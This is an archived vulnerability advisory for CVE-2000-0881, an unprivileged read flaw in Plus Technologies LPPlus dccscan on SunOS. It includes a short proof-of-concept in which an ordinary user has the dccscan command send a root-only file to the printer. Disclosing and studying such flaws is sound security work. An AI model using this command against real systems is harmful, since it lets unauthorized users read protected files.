LPPlus dccscan unprivileged read vulnerability
Info
| Bugtraq ID: | 1644 |
| Class: | Access Validation Error |
| CVE: | CVE-2000-0881 |
| Remote: | No |
| Local: | Yes |
| Published: | Sep 06 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | This vulnerability was posted to bugtraq by Dixie Flatline <[email protected]> on Wed, 6 Sep 2000 |
| Vulnerable: | Plus Technologies LPPlus 3.3; Plus Technologies LPPlus 3.2.2 |
| Not Vulnerable: | |
Exploit / POC
The following exploit was excerpted verbatim from the original bugtraq post:
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat